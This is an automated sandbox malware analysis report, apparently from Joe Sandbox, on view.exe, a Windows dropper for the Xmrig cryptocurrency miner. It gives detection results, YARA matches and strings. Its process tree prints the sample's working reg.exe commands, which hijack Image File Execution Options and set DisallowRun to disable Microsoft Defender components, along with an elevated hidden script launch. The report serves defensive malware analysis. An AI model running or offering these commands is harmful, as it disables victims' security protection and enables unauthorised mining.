Create Interactive Tour

Windows Analysis Report view.exe

Overview

General Information

Sample Name:view.exe
Analysis ID:470322
MD5:07deb2ac0ec36137243459603d1e7ee0
SHA1:bd8056e5ff137fa27cd1c89f8452be000771d831
SHA256:61c3940a461c53bfb0db4b5b0313a61b81a588c1970715a250f01f3101c7ccc5
Infos:

Most interesting Screenshot:

Detection

Xmrig
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected Xmrig cryptocurrency miner
Malicious sample detected (through community Yara rule)
Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for dropped file
Found strings related to Crypto-Mining
Uses cmd line tools excessively to alter registry or file data
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Changes security center settings (notifications, updates, antivirus, firewall)
Machine Learning detection for sample
Creates an undocumented autostart registry key
Contains functionality to detect sleep reduction / modifications
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara detected NirCmd tool
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Drops PE files to the application program directory (C:\ProgramData)
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Uses code obfuscation techniques (call, push, ret)
Creates files inside the system directory
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Too many similar processes found
Changes image file execution options
Contains functionality to call native functions
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to read the clipboard data
Found dropped PE file which has not been started or loaded
PE file contains executable resources (Code or Archives)
Creates a DirectInput object (often for capturing keystrokes)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
AV process strings found (often used to terminate AV products)
Sample file is different than original file name gathered from version info
Extensive use of GetProcAddress (often used to hide API calls)
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Uses reg.exe to modify the Windows registry
Dropped file seen in connection with other malware
Queries disk information (often used to detect virtual machines)
Found large amount of non-executed APIs
May check if the current machine is a sandbox (GetTickCount - Sleep)
Creates a process in suspended mode (likely to inject code)
Contains functionality for read data from the clipboard

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious
  • System is w10x64
  • view.exe (PID: 3728 cmdline: 'C:\Users\user\Desktop\view.exe' MD5: 07DEB2AC0EC36137243459603D1E7EE0)
    • cmd.exe (PID: 3636 cmdline: C:\Windows\system32\cmd.exe /c ''C:\Users\Public\StartPublic.cmd' ' MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 2296 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • choice.exe (PID: 4892 cmdline: choice /n /c yn /t 1 /d y MD5: 626F7BE965216FEAC7A3C0B4D3751BA2)
      • screen.exe (PID: 5316 cmdline: 'C:\ProgramData\screen.exe' elevate 'C:\ProgramData\screen.exe' exec hide 'C:\Users\Public\Public.cmd' MD5: A1CD6A64E8F8AD5D4B6C07DC4113C7EC)
        • screen.exe (PID: 2492 cmdline: 'C:\ProgramData\screen.exe' exec hide 'C:\Users\Public\Public.cmd' MD5: A1CD6A64E8F8AD5D4B6C07DC4113C7EC)
          • cmd.exe (PID: 1124 cmdline: C:\Windows\system32\cmd.exe /c ''C:\Users\Public\Public.cmd' ' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 1708 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
            • reg.exe (PID: 4972 cmdline: reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MsSense.exe' /v Defender1 /t REG_SZ /d 'cmd.exe' /f MD5: CEE2A7E57DF2A159A065A34913A055C2)
            • reg.exe (PID: 5284 cmdline: reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SenseCncProxy.exe' /v Defender2 /t REG_SZ /d 'cmd.exe' /f MD5: CEE2A7E57DF2A159A065A34913A055C2)
            • reg.exe (PID: 4576 cmdline: reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SenseIR.exe' /v Defender3 /t REG_SZ /d 'cmd.exe' /f MD5: CEE2A7E57DF2A159A065A34913A055C2)
            • reg.exe (PID: 968 cmdline: reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SenseNdr.exe' /v Defender4 /t REG_SZ /d 'cmd.exe' /f MD5: CEE2A7E57DF2A159A065A34913A055C2)
            • reg.exe (PID: 3560 cmdline: reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SenseSampleUploader.exe' /v Defender5 /t REG_SZ /d 'cmd.exe' /f MD5: CEE2A7E57DF2A159A065A34913A055C2)
            • reg.exe (PID: 4880 cmdline: reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SenseCE.exe' /v Defender6 /t REG_SZ /d 'cmd.exe' /f MD5: CEE2A7E57DF2A159A065A34913A055C2)
            • reg.exe (PID: 1376 cmdline: reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ConfigSecurityPolicy.exe' /v Defender7 /t REG_SZ /d 'cmd.exe' /f MD5: CEE2A7E57DF2A159A065A34913A055C2)
            • reg.exe (PID: 912 cmdline: reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpCmdRun.exe' /v Defender8 /t REG_SZ /d 'cmd.exe' /f MD5: CEE2A7E57DF2A159A065A34913A055C2)
            • reg.exe (PID: 1528 cmdline: reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MsMpEng.exe' /v Defender9 /t REG_SZ /d 'cmd.exe' /f MD5: CEE2A7E57DF2A159A065A34913A055C2)
            • reg.exe (PID: 244 cmdline: reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\NisSrv.exe' /v Defender10 /t REG_SZ /d 'cmd.exe' /f MD5: CEE2A7E57DF2A159A065A34913A055C2)
            • reg.exe (PID: 1008 cmdline: reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\OfflineScannerShell.exe' /v Defender11 /t REG_SZ /d 'cmd.exe' /f MD5: CEE2A7E57DF2A159A065A34913A055C2)
            • reg.exe (PID: 5400 cmdline: reg.exe ADD 'HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun' /v Defender1 /t REG_SZ /d 'MsSense.exe' /f MD5: CEE2A7E57DF2A159A065A34913A055C2)
            • reg.exe (PID: 3352 cmdline: reg.exe ADD 'HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun' /v Defender2 /t REG_SZ /d 'SenseCncProxy.exe' /f MD5: CEE2A7E57DF2A159A065A34913A055C2)
            • reg.exe (PID: 4912 cmdline: reg.exe ADD 'HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun' /v Defender3 /t REG_SZ /d 'SenseIR.exe' /f MD5: CEE2A7E57DF2A159A065A34913A055C2)
            • reg.exe (PID: 5680 cmdline: reg.exe ADD 'HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun' /v Defender4 /t REG_SZ /d 'SenseNdr.exe' /f MD5: CEE2A7E57DF2A159A065A34913A055C2)
            • reg.exe (PID: 1156 cmdline: reg.exe ADD 'HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun' /v Defender5 /t REG_SZ /d 'SenseSampleUploader.exe' /f MD5: CEE2A7E57DF2A159A065A34913A055C2)
            • reg.exe (PID: 6388 cmdline: reg.exe ADD 'HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun' /v Defender6 /t REG_SZ /d 'SenseCE.exe' /f MD5: CEE2A7E57DF2A159A065A34913A055C2)
            • reg.exe (PID: 6476 cmdline: reg.exe ADD 'HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun' /v Defender7 /t REG_SZ /d 'ConfigSecurityPolicy.exe' /f MD5: CEE2A7E57DF2A159A065A34913A055C2)
            • reg.exe (PID: 6536 cmdline: reg.exe ADD 'HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun' /v Defender8 /t REG_SZ /d 'MpCmdRun.exe' /f MD5: CEE2A7E57DF2A159A065A34913A055C2)
            • reg.exe (PID: 6556 cmdline: reg.exe ADD 'HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun' /v Defender9 /t REG_SZ /d 'MsMpEng.exe' /f MD5: CEE2A7E57DF2A159A065A34913A055C2)
  • svchost.exe (PID: 244 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5508 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5480 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5272 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 2308 cmdline: c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 2172 cmdline: c:\windows\system32\svchost.exe -k unistacksvcgroup MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 2524 cmdline: c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 4404 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • SgrmBroker.exe (PID: 3484 cmdline: C:\Windows\system32\SgrmBroker.exe MD5: D3170A3F3A9626597EEE1888686E3EA6)
  • svchost.exe (PID: 2420 cmdline: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6464 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • cleanup

Malware Configuration

No configs have been found
SourceRuleDescriptionAuthorStrings
config.jsonJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
    RtkAudio.exeMAL_XMR_Miner_May19_1Detects Monero Crypto Coin MinerFlorian Roth
    • 0x3decb0:$x1: donate.ssl.xmrig.com
    • 0x3df171:$x2: * COMMANDS 'h' hashrate, 'p' pause, 'r' resume
    RtkAudio.exeJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
      xmrig-cuda.dllJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
        SourceRuleDescriptionAuthorStrings
        C:\ProgramData\xmrig.cmdJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
          SourceRuleDescriptionAuthorStrings
          00000000.00000003.236853834.0000000003924000.00000004.00000001.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
            00000008.00000002.251856929.0000000000401000.00000040.00020000.sdmpJoeSecurity_NirCmdYara detected NirCmd toolJoe Security
              00000009.00000002.252419669.0000000000401000.00000040.00020000.sdmpJoeSecurity_NirCmdYara detected NirCmd toolJoe Security
                Process Memory Space: view.exe PID: 3728JoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
                  Process Memory Space: screen.exe PID: 2492JoeSecurity_NirCmdYara detected NirCmd toolJoe Security
                    SourceRuleDescriptionAuthorStrings
                    8.2.screen.exe.400000.0.unpackJoeSecurity_NirCmdYara detected NirCmd toolJoe Security
                      9.2.screen.exe.400000.0.unpackJoeSecurity_NirCmdYara detected NirCmd toolJoe Security

                        Sigma Overview

                        No Sigma rule has matched

                        Jbx Signature Overview

                        Click to jump to signature section

                        Show All Signature Results

                        AV Detection:

                        barindex
                        Multi AV Scanner detection for submitted file
                        Source: view.exeVirustotal: Detection: 62%Perma Link
                        Source: view.exeReversingLabs: Detection: 58%
                        Antivirus / Scanner detection for submitted sample
                        Source: view.exeAvira: detected
                        Multi AV Scanner detection for dropped file
                        Source: C:\ProgramData\screen.exeVirustotal: Detection: 11%Perma Link
                        Source: C:\ProgramData\screen.exeMetadefender: Detection: 14%Perma Link
                        Machine Learning detection for sample
                        Source: view.exeJoe Sandbox ML: detected
                        Source: 8.0.screen.exe.400000.0.unpackAvira: Label: TR/Crypt.XPACK.Gen3
                        Source: 9.0.screen.exe.400000.0.unpackAvira: Label: TR/Crypt.XPACK.Gen3
                        Source: 0.0.view.exe.1b4c544.2.unpackAvira: Label: TR/Patched.Ren.Gen
                        Source: 0.2.view.exe.1b4c544.2.unpackAvira: Label: TR/Patched.Ren.Gen

                        Bitcoin Miner:

                        barindex
                        Yara detected Xmrig cryptocurrency miner
                        Source: Yara matchFile source: config.json, type: SAMPLE
                        Source: Yara matchFile source: RtkAudio.exe, type: SAMPLE
                        Source: Yara matchFile source: xmrig-cuda.dll, type: SAMPLE
                        Source: Yara matchFile source: 00000000.00000003.236853834.0000000003924000.00000004.00000001.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: view.exe PID: 3728, type: MEMORYSTR
                        Source: Yara matchFile source: C:\ProgramData\xmrig.cmd, type: DROPPED
                        Found strings related to Crypto-Mining
                        Source: RtkAudio.exeString found in binary or memory: stratum+tcp://
                        Source: RtkAudio.exeString found in binary or memory: cryptonight/0
                        Source: RtkAudio.exeString found in binary or memory: stratum+tcp://
                        Source: RtkAudio.exeString found in binary or memory: -o, --url=URL URL of mining server
                        Source: RtkAudio.exeString found in binary or memory: Usage: xmrig [OPTIONS]
                        Source: RtkAudio.exeString found in binary or memory: Usage: xmrig [OPTIONS]
                        Source: view.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI
                        Source: C:\Windows\SysWOW64\cmd.exeDirectory created: C:\Program Files\BitdefenderJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeDirectory created: C:\Program Files\Bitdefender\Endpoint SecurityJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeDirectory created: C:\Program Files\ESTsoftJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeDirectory created: C:\Program Files\ESTsoft\ALYacJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeDirectory created: C:\Program Files\AhnLabJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeDirectory created: C:\Program Files\MalwarebytesJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeDirectory created: C:\Program Files\Malwarebytes\Anti-MalwareJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeDirectory created: C:\Program Files\Norton SecurityJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeDirectory created: C:\Program Files\Norton Security\EngineJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeDirectory created: C:\Program Files\Avast SoftwareJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeDirectory created: C:\Program Files\Alwil SoftwareJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeDirectory created: C:\Program Files\McAfee Security ScanJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeDirectory created: C:\Program Files\ESETJump to behavior
                        Source: Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: WinRing0x64.sys
                        Source: C:\Users\user\Desktop\view.exeCode function: 0_2_00404B24 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,
                        Source: C:\ProgramData\screen.exeCode function: 8_2_004024C1 FindFirstFileA,FindNextFileA,FindClose,
                        Source: C:\ProgramData\screen.exeCode function: 8_2_004030D0 FindFirstFileA,FindNextFileA,strlen,strlen,
                        Source: WinRing0x64.sysString found in binary or memory: http://crl.globalsign.net/ObjectSign.crl0
                        Source: WinRing0x64.sysString found in binary or memory: http://crl.globalsign.net/Root.crl0
                        Source: WinRing0x64.sysString found in binary or memory: http://crl.globalsign.net/RootSignPartners.crl0
                        Source: WinRing0x64.sysString found in binary or memory: http://crl.globalsign.net/primobject.crl0
                        Source: svchost.exe, 0000000E.00000002.496616389.000001EE23414000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
                        Source: screen.exe, screen.exe, 00000009.00000002.252419669.0000000000401000.00000040.00020000.sdmpString found in binary or memory: http://nircmd.nirsoft.net
                        Source: screen.exe, screen.exe, 00000009.00000002.252419669.0000000000401000.00000040.00020000.sdmpString found in binary or memory: http://nircmd.nirsoft.net/%s.html
                        Source: screen.exe, 00000008.00000002.251856929.0000000000401000.00000040.00020000.sdmp, screen.exe, 00000009.00000002.252419669.0000000000401000.00000040.00020000.sdmpString found in binary or memory: http://nircmd.nirsoft.net/%s.htmlhttp://nircmd.nirsoft.net
                        Source: svchost.exe, 0000000E.00000002.496616389.000001EE23414000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0:
                        Source: svchost.exe, 0000000E.00000002.496703650.000001EE2343F000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.msocsp.com0
                        Source: svchost.exe, 0000000E.00000002.497000894.000001EE23600000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
                        Source: svchost.exe, 00000022.00000002.310249005.00000155B1C13000.00000004.00000001.sdmpString found in binary or memory: http://www.bingmapsportal.com
                        Source: view.exe, 00000000.00000003.236789443.0000000003924000.00000004.00000001.sdmp, unpro.exe.0.drString found in binary or memory: http://www.info-zip.org/zip-bug.html;
                        Source: screen.exe, screen.exe, 00000009.00000002.252419669.0000000000401000.00000040.00020000.sdmpString found in binary or memory: http://www.nirsoft.net
                        Source: screen.exe, 00000008.00000002.251856929.0000000000401000.00000040.00020000.sdmp, screen.exe, 00000009.00000002.252419669.0000000000401000.00000040.00020000.sdmpString found in binary or memory: http://www.nirsoft.netopenIf
                        Source: svchost.exe, 0000001E.00000002.493904726.000002BC5AC3D000.00000004.00000001.sdmpString found in binary or memory: https://%s.dnet.xboxlive.com
                        Source: svchost.exe, 0000001E.00000002.493904726.000002BC5AC3D000.00000004.00000001.sdmpString found in binary or memory: https://%s.xboxlive.com
                        Source: svchost.exe, 0000001E.00000002.493904726.000002BC5AC3D000.00000004.00000001.sdmpString found in binary or memory: https://activity.windows.com
                        Source: svchost.exe, 00000022.00000003.309529010.00000155B1C60000.00000004.00000001.sdmpString found in binary or memory: https://appexmapsappupdate.blob.core.windows.net
                        Source: svchost.exe, 0000001E.00000002.493904726.000002BC5AC3D000.00000004.00000001.sdmpString found in binary or memory: https://bn2.notify.windows.com/v2/register/xplatform/device
                        Source: svchost.exe, 0000001E.00000002.493904726.000002BC5AC3D000.00000004.00000001.sdmpString found in binary or memory: https://co4-df.notify.windows.com/v2/register/xplatform/device
                        Source: svchost.exe, 00000022.00000003.309620724.00000155B1C5A000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Imagery/Copyright/
                        Source: svchost.exe, 00000022.00000003.309529010.00000155B1C60000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Locations
                        Source: svchost.exe, 00000022.00000002.310757725.00000155B1C3D000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Routes/
                        Source: svchost.exe, 00000022.00000003.309529010.00000155B1C60000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/mapcontrol/logging.ashx
                        Source: svchost.exe, 00000022.00000003.309501692.00000155B1C48000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v=
                        Source: svchost.exe, 00000022.00000003.309529010.00000155B1C60000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Locations
                        Source: svchost.exe, 00000022.00000002.310757725.00000155B1C3D000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/
                        Source: svchost.exe, 00000022.00000003.309529010.00000155B1C60000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Driving
                        Source: svchost.exe, 00000022.00000003.309529010.00000155B1C60000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Transit
                        Source: svchost.exe, 00000022.00000003.309529010.00000155B1C60000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Walking
                        Source: svchost.exe, 00000022.00000003.309685565.00000155B1C40000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Transit/Schedules/
                        Source: svchost.exe, 00000022.00000003.309685565.00000155B1C40000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=
                        Source: svchost.exe, 00000022.00000003.309529010.00000155B1C60000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/mapcontrol/logging.ashx
                        Source: svchost.exe, 00000022.00000003.309685565.00000155B1C40000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
                        Source: svchost.exe, 00000022.00000003.309620724.00000155B1C5A000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
                        Source: svchost.exe, 00000022.00000003.309620724.00000155B1C5A000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
                        Source: svchost.exe, 00000022.00000003.309620724.00000155B1C5A000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
                        Source: svchost.exe, 00000022.00000003.309501692.00000155B1C48000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.t
                        Source: svchost.exe, 00000022.00000003.309529010.00000155B1C60000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
                        Source: svchost.exe, 00000022.00000002.310757725.00000155B1C3D000.00000004.00000001.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
                        Source: svchost.exe, 00000022.00000003.287812983.00000155B1C31000.00000004.00000001.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=
                        Source: svchost.exe, 00000022.00000002.310757725.00000155B1C3D000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
                        Source: svchost.exe, 00000022.00000002.310249005.00000155B1C13000.00000004.00000001.sdmp, svchost.exe, 00000022.00000002.310757725.00000155B1C3D000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
                        Source: svchost.exe, 00000022.00000003.309685565.00000155B1C40000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
                        Source: svchost.exe, 00000022.00000003.309685565.00000155B1C40000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=
                        Source: svchost.exe, 00000022.00000003.287812983.00000155B1C31000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
                        Source: svchost.exe, 00000022.00000003.287812983.00000155B1C31000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen
                        Source: svchost.exe, 00000022.00000003.309501692.00000155B1C48000.00000004.00000001.sdmpString found in binary or memory: https://t0.tiles.ditu.live.com/tiles/gen
                        Source: RtkAudio.exeString found in binary or memory: https://xmrig.com/docs/algorithms
                        Source: RtkAudio.exeString found in binary or memory: https://xmrig.com/wizard
                        Source: RtkAudio.exeString found in binary or memory: https://xmrig.com/wizard%s
                        Source: unknownDNS traffic detected: queries for: clientconfig.passport.net
                        Source: C:\ProgramData\screen.exeCode function: 8_2_00402CB5 GetClipboardData,GlobalFix,CreateFileA,SetFilePointer,CloseHandle,GlobalUnWire,CloseClipboard,
                        Source: view.exe, 00000000.00000002.249411774.0000000001DC8000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
                        Source: C:\ProgramData\screen.exeCode function: 8_2_00402057 GetObjectA,GetDC,CreateDIBitmap,ReleaseDC,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,DeleteObject,
                        Source: reg.exeProcess created: 58

                        System Summary:

                        barindex
                        Malicious sample detected (through community Yara rule)
                        Source: RtkAudio.exe, type: SAMPLEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                        Source: view.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI
                        Source: Yara matchFile source: 8.2.screen.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 9.2.screen.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000008.00000002.251856929.0000000000401000.00000040.00020000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000009.00000002.252419669.0000000000401000.00000040.00020000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: screen.exe PID: 2492, type: MEMORYSTR
                        Source: RtkAudio.exe, type: SAMPLEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
                        Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmpJump to behavior
                        Source: C:\ProgramData\screen.exeCode function: String function: 00410900 appears 85 times
                        Source: C:\ProgramData\screen.exeCode function: 8_2_00405118 PostQuitMessage,PostQuitMessage,PostQuitMessage,NtdllDefWindowProc_A,
                        Source: C:\Users\user\Desktop\view.exeCode function: 0_2_00412BB8: CreateFileA,DeviceIoControl,CreateFileA,DeviceIoControl,
                        Source: view.exeStatic PE information: Resource name: RT_RCDATA type: Zip archive data, at least v1.0 to extract
                        Source: view.exeStatic PE information: Resource name: RT_RCDATA type: Zip archive data, at least v1.0 to extract
                        Source: view.exeStatic PE information: Resource name: RT_RCDATA type: PE32 executable (console) Intel 80386, for MS Windows
                        Source: view.exeStatic PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                        Source: view.exe, 00000000.00000003.236839389.0000000003924000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameNirCmd.exe. vs view.exe
                        Source: view.exe, 00000000.00000002.249849550.0000000003D60000.00000002.00000001.sdmpBinary or memory string: originalfilename vs view.exe
                        Source: view.exe, 00000000.00000002.249849550.0000000003D60000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamepropsys.dll.mui@ vs view.exe
                        Source: view.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                        Source: view.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                        Source: C:\Windows\System32\svchost.exeSection loaded: xboxlivetitleid.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: cdpsgshims.dll
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MsSense.exe' /v Defender1 /t REG_SZ /d 'cmd.exe' /f
                        Source: Joe Sandbox ViewDropped File: C:\ProgramData\screen.exe B994AE5CBFB5AD308656E9A8BF7A4A866FDEB9E23699F89F048D7F92E6BB8577
                        Source: view.exeVirustotal: Detection: 62%
                        Source: view.exeReversingLabs: Detection: 58%
                        Source: C:\Users\user\Desktop\view.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                        Source: unknownProcess created: C:\Users\user\Desktop\view.exe 'C:\Users\user\Desktop\view.exe'
                        Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                        Source: C:\Users\user\Desktop\view.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\Public\StartPublic.cmd' '
